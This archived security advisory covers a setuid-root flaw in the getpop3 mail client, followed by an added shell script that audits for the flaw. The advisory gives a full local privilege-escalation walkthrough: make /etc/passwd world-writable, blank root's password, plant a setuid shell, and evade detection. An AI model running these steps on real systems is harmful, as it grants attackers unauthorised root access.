getpop3.txt

Date: 02 Mar 2000 00:00:00 | Reported by: r3p3nt | Type: packetstorm | Source: packetstormsecurity.com

getpop3 (version 1.08 in the advisory below) is a POP3 mail client for Linux that is installed setuid root. According to the advisory, running it with the -U option leaves the named file world-writable, so an unprivileged local user can point it at /etc/passwd and escalate to root.

Code
`########################################  
#what?: [=-getpop3 exploit-=] #  
#who?: [- by r3p3nt of the DHC -] #  
#where?: [- http://dhc1.cjb.net -] #  
#contact?: [- [email protected] #  
########################################  
greets: all of DHC, duke, f0rpaxe, artech, and eli (up for some raceball?)  
thanks: jwb  
  
[email protected]  
  
You are wondering "hmm..what is getpop3, mister r3p3nt". Well, getpop3 is a  
POP mail client for Linux (no, not that stuff in Chex mix). This exploit has  
been known by me for a very long time..so I might as well release it now.  
This exploit was found when someone (he will go unnamed because I don't want  
Joel to look like a fool) said his Linux box was 'secure, no one can hack  
it'. After some fumbling around on his box...root access was obtained.  
The hole? Getpop3. Getpop3 is installed SUID root. If you don't know what SUID  
root is..don't use this exploit@!$ When getpop3 is fed the -U parameter it sets  
a file world writable. If you are a goon..here is how this could be good:  
  
lamebox:~$ id  
uid=1000(elf) gid=100(users) groups=100(users)  
lamebox:~$ cp /etc/passwd /tmp/backup  
lamebox:~$ getpop3 -V  
getpop3 1.08 Copyright 1997 Double Precision, Inc.  
  
lamebox:~$ getpop3 -U /etc/passwd  
enter userid: elf  
enter password: mypassword  
enter host:poopy.reallame666.com  
querying poopy.reallame666.com  
+OK poopy.reallame666.com POP3 server (Netscape Mail Server v2.02) ready Fri, 1  
>USER elf  
+OK Password required for elf  
>PASS password  
+OK elf's mailbox has 0 messages (0 octets)  
>STAT  
+OK 0 0  
>QUIT  
+OK poopy.reallame666.com POP3 server closing connection  
  
*************************************************************  
Whoo hooo! Now /etc/passwd is world writable..the fun begins*  
Remember the file we backed up? *  
*************************************************************  
  
lamebox:~$ cat /tmp/backup > /etc/passwd  
  
***********************************************************************  
now edit the passwd file so you are 0:0 ...like so: *  
root:x:0:0:super admin,,,:/root:/bin/bash <-- whats in the /etc/passwd*  
root::0:0:your daddy,,,:/root/:bin/bash <-- what you change it to *  
Now log on as root!@# *  
If you didn't fuck anything up you should be dropped to a root shell, *  
and not asked for a password. *  
Don't wanna overwrite /etc/passwd? Then use .rhosts .Hell, you could *  
even edit the admins .login ...and make it so when the logs in he/she *  
tosses an SUID root shell in /tmp *  
Be creative in what you do, and don't get caught! *  
***********************************************************************  
  
*************FIX*********************************************  
* I haven't noticed the hole in the newer versions. Upgrade. *  
*************************************************************  
`
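The advisory depends on two conditions an administrator can check for directly: a setuid-root getpop3 binary, and a world-writable /etc/passwd (or a passwd file that has already been edited to give root an empty password or to add a second uid 0 account). The script below is an added example written for this page; it is not r3p3nt's code and not part of getpop3. It assumes a POSIX shell with POSIX `find` and `awk`, takes the advisory's description of `getpop3 -U` at face value, and does not reproduce the exploit itself. The function names (`setuid_root`, `world_writable`, `passwd_audit`, `list_setuid_root`, `strip_setuid`, `audit_host`) are this example's own.

```shell
#!/bin/sh
# Added example, not part of r3p3nt's advisory or of getpop3: audit helpers
# for the conditions the advisory depends on. Assumes a POSIX shell with
# POSIX find and awk. All paths are parameters so the helpers can be run
# against a copy or a test file instead of the live /etc/passwd.

# Print "setuid-root" when the file has the setuid bit and is owned by root.
# -prune keeps find from descending if a directory is passed by mistake.
setuid_root() {
    if [ -n "$(find "$1" -prune -perm -4000 -user root -print 2>/dev/null)" ]; then
        echo setuid-root
    else
        echo ok
    fi
}

# Print "world-writable" when "other" has write permission on the file,
# which is the state the advisory says `getpop3 -U <file>` leaves behind.
world_writable() {
    if [ -n "$(find "$1" -prune -perm -0002 -print 2>/dev/null)" ]; then
        echo world-writable
    else
        echo ok
    fi
}

# List passwd-format entries that are either uid 0 under a name other than
# root, or have an empty password field: the two edits the advisory makes.
# Reads the file given as $1 so it can be pointed at a backup copy too.
passwd_audit() {
    awk -F: '
        NF < 7 || $0 ~ /^#/      { next }              # skip malformed or comment lines
        $3 == 0 && $1 != "root"  { print "uid0:" $1 }
        $2 == ""                 { print "nopass:" $1 }
    ' "$1"
}

# Sweep a filesystem for every setuid-root regular file, so getpop3 is not
# the only one you look at. -xdev stays on one filesystem.
list_setuid_root() {
    find "$1" -xdev -type f -perm -4000 -user root -print 2>/dev/null
}

# Stopgap until the upgrade the advisory recommends: drop the setuid bit.
# Must be run as root to have any effect.
strip_setuid() {
    chmod u-s "$1"
}

# Audit the live host. Invoke with: sh audit.sh --run
audit_host() {
    bin=$(command -v getpop3 2>/dev/null)
    if [ -n "$bin" ]; then
        echo "getpop3: $(setuid_root "$bin") ($bin)"
    else
        echo "getpop3: not in PATH"
    fi
    echo "/etc/passwd: $(world_writable /etc/passwd)"
    passwd_audit /etc/passwd
}

if [ "${1:-}" = "--run" ]; then
    audit_host
fi
```

`passwd_audit` flags the exact passwd line the advisory writes (`root::0:0:...`) as `nopass:root`, and flags any extra uid 0 account as `uid0:<name>`; `world_writable` is the quickest way to confirm whether `-U` has already been run against a file. Neither helper needs root to run, so an ordinary user can check a box before reporting it.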
